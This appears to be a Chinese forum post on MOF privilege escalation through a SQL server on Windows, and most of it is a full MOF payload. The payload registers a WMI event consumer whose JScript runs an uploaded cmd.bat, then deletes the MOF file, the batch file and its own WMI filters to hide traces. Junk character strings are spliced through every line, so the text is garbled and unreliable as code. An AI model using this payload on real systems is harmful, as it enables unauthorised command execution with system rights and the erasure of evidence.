这个sql提权MOF需要运行 system下的文件,不能定义路径。
' w. ]2 ^! A' _8 D1 `+ t8 J需要将要运行的命令写入到bat上传到system32目录,然后执行。" T- ]; L( S7 I4 ]+ z" O. h* y
t1 ~0 Q, j* _( j: H
这个sql提权MOF需要运行 system下的文件,不能定义路径。
9 V2 B: {5 V6 J2 j3 m- Q: [) e需要将要运行的命令写入到bat上传到system32目录,然后执行。
) K/ l6 Z2 y4 D9 L+ N% m& \
+ c' p4 H4 B- \3 F, e2 v/ ^* y* k#pragma+ ^1 f3 S: f! m2 \9 r
namespace("\\\\.\\root\\cimv2")
6 z; i- M% ^# |& T; r# b* d# a class
8 R6 t" z; h/ w* o5 ?1 R5 T- a MyClass5479 Q- C! T6 Q4 Z0 e! k! i% {! [( i
{ [key]" c y9 g# {4 o4 ?! `, {. v
string+ W9 W \1 A" t5 W1 o% \2 Y
Name;: a* a* q6 }/ h% ?3 e* [
};
( j1 g. x; n9 W: V& h8 a/ \ class
1 z& b6 |$ R! I6 C ActiveScriptEventConsumer
) L! V) G) v& X/ p : __EventConsumer { [key]
% u5 e$ T. {, x string1 J/ A* {( a3 F4 n
Name; [not_null]* f! \5 O, X* W" Z
string
+ T( i- G9 O( t ScriptingEngine; string1 p i' K$ M+ [' ~* l* F& H
ScriptFileName; [template]
' S5 g7 Z. q0 E- [# K! ?; z1 M string
% {( P. W- @2 v. o" a' P ScriptText; uint32 KillTimeout;
8 g* E. `4 [5 y' u3 J( I& Z }; instance of __Win32Provider as $P {4 t+ c( W6 P) t& G' P$ r- ?
Name- {, V k) i6 ]/ O3 v
=
" C$ P E8 `) }1 ~) U "ActiveScriptEventConsumer"; CLSID =8 S, D; u3 U" p0 \: e, k
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";" i* N J$ M% w6 }) s( c6 |0 z
PerUserInitialization8 L6 h9 Z1 x# M6 d0 G5 S) N
= TRUE;( A ?, c7 p3 R2 M+ E( I; P/ ^
}; instance of __EventConsumerProviderRegistration { Provider
2 Z% F6 l* T# T( Z- t' R0 R3 T& L' h, Q = $P; ConsumerClassNames
; y! Q& U" i) q5 B$ P =
. t9 X! F) n: o0 ~ {"ActiveScriptEventConsumer"};
* e5 y2 P6 S$ P- M# C };
1 {( M- L8 b/ l4 o Instance of ActiveScriptEventConsumer( e& s; P& U( q
as $cons { Name
' \; i3 ~ u" w8 _2 w8 s9 f5 G# _ =4 N0 `! Q$ T" x3 C* ^/ Q- m
"ASEC"; ScriptingEngine) b% Q; J, R0 }8 q
=
- p( N7 r+ l0 ~2 P8 X4 F "JScript"; ScriptText
) q% G/ c) }/ d" t8 @* X- h- _ =
9 Y+ r, ?( _7 B "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };" \9 H( e6 V c; t" G& ^
Instance of ActiveScriptEventConsumer$ m2 L1 K- ?. H4 ~% _9 d
as $cons2 { Name% s7 `* G$ {( n
=
3 d4 W6 _' A8 q% I( v "qndASEC"; ScriptingEngine- R& H7 g/ [0 V
=
+ L1 t7 d& y0 y* W* ?+ n "JScript"; ScriptText
7 Q* m$ L8 O8 t4 b( |9 K =. @% z( O4 o ^0 L, {
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
+ |9 T7 h' B+ Z" `" i5 c }; instance of __EventFilter as $Filt { Name
) }! L1 ^: t( x1 u: R- W% f9 F =
6 t9 n# E2 S9 D+ K "instfilt"; Query
+ O0 i7 S* [1 M f1 M o =
1 ?$ K) O/ D$ L "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
9 s: B* ^6 f6 X" | I: K =
' n! q$ @" V# [1 g# {' _ "WQL"; }; instance of __EventFilter as $Filt2 { Name- p: n0 s0 \4 V- O
=
. p$ ?4 {, P' ] "qndfilt"; Query9 t9 r2 R2 b# w" n8 s
=
/ z- J- n1 k q1 l5 C7 ~$ O, I "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
. R& j$ m' d5 G# x' L6 u =8 k" m+ ?0 P# r8 F
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer p+ z9 O+ ~, P1 {( I0 n+ o
= $cons; Filter% K5 K& H0 ^% U& G
= $Filt;/ B. L6 c( r! P* G0 q7 S
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
6 P- N3 O7 L( D$ @* B* C! K: e/ }! B = $cons2; Filter0 n4 r" T$ [' U$ W% n; ^1 @
= $Filt2;
( n) z( Q7 f8 V% k }; instance of MyClass547
1 [! _4 A9 C* U! K! p$ W0 s as $MyClass { Name
- J: L( C, N1 T* e2 W; A ?0 Y8 U3 O =
, l* P) `' u/ L5 f, ~9 b6 X* q "ClassConsumer";. r$ b4 W( z, C U5 p3 ?5 A$ d, n$ K
}; |